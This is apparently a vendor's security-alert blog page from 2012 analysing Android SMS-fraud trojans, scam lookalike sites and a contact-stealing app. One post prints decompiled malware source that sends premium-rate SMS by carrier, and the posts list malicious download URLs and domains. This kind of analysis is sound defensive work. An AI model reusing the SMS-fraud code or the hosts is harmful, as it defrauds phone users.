[ Security Alert ] 27 July, 2012 10:18

    AegisLab discovered a fake Adobe Flash Player app in 3rd party market in Russia. Actually, it's a variant of FakeInst (aka OpFake, SMSSend or TrojanSMS) which tricks victim to download and install it, then send SMS to premium-rate number. The VirusTotal detection rate is shown as below:

SHA256: 95781ff40529e6647f02e96e96c2f5d86a31cf9d2f02592d6b7666068925a225
SHA1: a04718f91e86ee6619f910c76509c0e16724c356
MD5: 0d8d9ad5a98ce9d77462779036cf0295
File size: 317.0 KB ( 324634 bytes )
File name: adobe_flash_player_v10.3.185.25_installer.apk
File type: Android
Tags: android
Detection ratio: 2 / 41
Analysis date: 2012-07-26 06:47:48 UTC
 
After analyzing this malicious app and check the complex hyper links inside the app in-depth, we found the following Android Markets (or websites) are all malicious, which host many malicious apks (some are normal):
  • androidmir.com 和 android-mir.com (Figure 1)
  • myadroidmaklet.net ( Figure 2)
  • filedats.net ( Figure 3)
  • file77mibi.net
  • androidmarkt.ru

Figure 1: androidmir.com

 

Figure 2: myadroidmaklet.net

 

Figure 3: filedats.net

 

How do we find the above malicious websites? That's because one day while our WebGuard Team patrols on the Internet, the researcher finds a suspicious link to a Android APK called "Cool Reader". The link is not so simple and direct, it will redirect you to another page and jump to another site in order to evade the detection and tracking. Once you install the app completely, the fake app will issue an emergent update notification which tricks you to download another app. In the following figures, you will see the whole trick tips:

Figure 4: Cool Reader

 

Figure 5: fake installation process

 

Figure 6: fake disclaimer (can you see the notification on the upper-left corner?)

 

Figure 7: try to download another app

 

Figure 8: fake login page (just press Enter is ok)

 

Figure 9: lure you to link http://androidmir.com/download/cr3-0-45-07.apk (link is not existent)

 

Figure 10: the emergent update notification for Adobe Flash Player

 

Figure 11: connect to myadroidmaklet.net

 

While you are installing the fake Adobe Flash Player, you will see it require read/send SMS, read contact data and read GPS location permissions (Figure 12,13). Actually, normal Adobe Flash Player doesn't need such permissions.

Figure 12,13: fake Adobe Flash Player

 

Once the installation completed, you will find a shortcut on the desktop. After clicking, one "Browser" app will be downloaded and installed (Figure 14,15). The "Browser" app requires the same permissions as fake Adobe Flash Player (Figure 16,17). 

  

Figure 14,15: update browser ? (just a trick)

 

Figure 16,17: fake Browser

 

Yes, this kind of attack is old-fashioned and nothing special, but Android users are always being tricked. AegidsLab reminds you that only download apps from trusted Android Markets, never click suspicious links and install AegisLab Antivirus :-)


By AegisLab 

 

[ Security Alert ] 24 July, 2012 18:15

    AegisLab discovered a russian website called "google-file.com" which has a google style look(Figure 1). But actually it's not an official google service, it's a premium-rate SMS scam website. If you want to download some files(figure 2), you have to enter your phone number(figure 3) first and then the page will tell you to send texts to specific number in order to verify your identity(figure 4). Finally, you money will fly away(figure 5). 

 

Figure 1: Google-File.com

 

Figure 2: File to download

 

Figure 3: Input your phone number

 

Figure 4: Send premium-rate SMS to specific number

 

Figure 5: so many complaints to google-file.com

 

We also found "google-fiile.mk3k.ru", "google-fille.org", and "google-fiile.org" are redirecting to Google-File.com. AegisLab WebGuard has blocked these 4 websites! 

 

By AegisLab

  

[ Security Alert ] 20 July, 2012 14:33

    Last week, AegisLab published「Security Alert 2012-07-12: Malicious "Super Mario Bros." App in Google Play」, we mentioned that the 2nd stage infection is trying to download a apk - called "Activator.apk", the snippet code is listed as below marked as red color:

-----------------------------------------------------------------------
package com.activator;

import android.app.Activity;
import android.app.AlertDialog;
import android.app.AlertDialog.Builder;
import android.content.DialogInterface;
import android.content.DialogInterface.OnClickListener;
import android.os.Bundle;
import android.telephony.SmsManager;
import android.telephony.TelephonyManager;
import java.util.Random;
import java.util.regex.Pattern;

public class ActivatorActivity extends Activity
{
TelephonyManager TM;
AlertDialog.Builder builder;
String operator;

private void sendSMS(String paramString1, String paramString2)
{
SmsManager.getDefault().sendTextMessage(paramString1, null, paramString2, null, null);
}


protected void onCreate(Bundle paramBundle)
{
super.onCreate(paramBundle);
setContentView(2130903040);
this.TM = ((TelephonyManager)getSystemService("phone"));
this.operator = this.TM.getSimOperatorName();
if (Pattern.matches("[bBeEeE]*", this.operator.substring(0, 3)))
{
int k = 1 + new Random().nextInt(10000);
startProgress("1518", "DEF1773");
startProgress("3170", "4037" + k);

setResult(1);
finish();
}
while (true)
{
return;
if (Pattern.matches("[mMtTsS]*", this.operator.substring(0, 3)))
{
int j = 1 + new Random().nextInt(10000);
startProgress("770656", "DEF1773");
startProgress("3170", "4037" + j);

setResult(1);
finish();
continue;
}
if (this.operator.equalsIgnoreCase(""))
{
this.builder = new AlertDialog.Builder(this);
this.builder.setCancelable(false);
this.builder.setMessage("Ошибка при загрузке базы обоев. Попробуйте позже.");
this.builder.setNeutralButton("OK", new DialogInterface.OnClickListener()
{
public void onClick(DialogInterface paramDialogInterface, int paramInt)
{
ActivatorActivity.this.setResult(0);
ActivatorActivity.this.finish();
}
});
this.builder.create().show();
continue;
}
int i = 1 + new Random().nextInt(10000);
startProgress("3170", "4037" + i);

setResult(1);
finish();
}
}

public void startProgress(String paramString1, String paramString2)
{

new Thread(new Runnable(paramString1, paramString2)
{
public void run()
{
ActivatorActivity.this.sendSMS(this.val$number, this.val$message);
}
}).start();
}
}

-----------------------------------------------------------------------

Basically, it will send different message to different number based on different OperatorName:

operator = OperatorName()
Case1:
Pattern.matches("[bBeEeE]*", operator.substring(0, 3))
number=1518, message="DEF1773"
number=3170, message="4037" + 1~10000 (any number)

Case2:
Pattern.matches("[mMtTsS]*", operator.substring(0, 3))
number=770656, message="DEF1773"
number=3170, message="4037" + 1~10000(any number)

Case3(neither case 1 or case 2 and OperatorName is not empty)
number=3170, message="4037" + 1~10000(any number)

If operatorName is empty, a alert dialog will pop up - "Ошибка при загрузке базы обоев. Попробуйте позже." (translated by google - "Failed to load base wallpaper. Please try again later")

Because "Super Mario Bros." is masqueraded as a wallpaper app, this message just tricks you.


By AegisLab

 

[ Security Alert ] 12 July, 2012 17:57

    According to Symantec and F-Secure blogs, malicious "Super Mario Bros." app appears in Google Play for several days. It looks like a action game, but after installation completed, you will see icon display "Mario HD Wallpaper" as in Figure 2. Google Play has removed this app and some related apps with the same developer, but you can find the apps in 3rd-party market as in Figure 1. This app uses 2-stage or multi-stage infection technique in order to evade Google Play review. Simply speaking, the first stage app is usually harmless, but the second stage will download some malicious contents or another malicious apk to install.

In this app(Super Mario Bros.), we found 3 links to drop box are malicious, they all point to (http://dl.dropbox.com/u/87265868/Activator.apk) !

 

Obviously, you can see the second stage is to download "Activator.apk" and install. After installation completed, "Activator" will be launched and send premium-rate SMS (target Eastern-Euorpean area) and finally un-install itself.

Figure 1: We discovered it on 3rd-party market.

 

Figure 2: "Mario HD Wallpaper"

 

Figure 3: Russian disclaimer

 

Figure 4: Russian disclaimer

  

Figure 5: AegisLab Antivirus detected

VirusTotal detection rate:

According to the developer information, AegisLab discovered 5 related apps with the same developer and AegisLab Antivirus can detect them all.

By AegisLab 

[ Security Alert ] 12 July, 2012 13:55

    Remember the security alert we published before:「Security Alert 2012-05-29: Facebook URL Hijacking」, AegisLab discovered the website style in facenook.com and facevook.com look more similar as FB official website as in Figure 1.

Figure 1: Look so similar as Facebook style


Once you get into the page, you will hear the recording voice as follows:
"You have been selected to take part in our anonymous survey! 
Complete this 30 second questionnaire, and to say "thank you", we'll offer you an exclusive gift."

Click the "Start" button and then fill-in the answer:

Figure 2: Answer the questions

 

After answering the all 5 questions,  Best Buy and Walmart Gift Card win-prize page will pop-up as in Figure 3. (Don't even think about it, you'll never win the prize!)

Figure 3: Choose the gift card

 

After choosing the gift card you want, you have to input the cell phone number and e-mail address as in Figure 4. (OMG! Don't do that!)

Figure 4: Fill-in cell phone number and e-mail address

Congratulation! You have finished the questionnaire but all in vain, except leaking your sensitive information. (and will get more spam :-) )

 

By AegsiLab 

[ Security Alert ] 06 July, 2012 16:57

    Yesterday Kaspersky Lab found a trojan app both on Google Play and Apple App Store, it's called "Find and Call" (Figure 1)。After installation, if you have SIM card on your phone, it will tell you to input phone number to register; if there is no SIM card but Wifi is available, it will tell you to input e-mail address to register (Figure 2). Actually, these information are not verified by server, this app just collects contact info from your phone book and send back to CnC server. Then spam SMS will be issued from the server and masqueraded as a trusted source. Figire 3 is the app running screen shot.

AegisLab Antivirus Scanner can detect this malicious app (Figure 4) ; As for iOS user, you have to remove this app ASAP! (perhaps your sensitive info leaked already...)

Figure 1: App installed completely 

 

 

Figure 2: Input e-mail address to register

 

Figure 3: "Find and Call" is running

 

Figure 4: AegisLab Antivirus Scanner detected

 

By AegisLab

 

«Previous   1 2 3 4 5 6 7 8 ... 18 19 20  Next»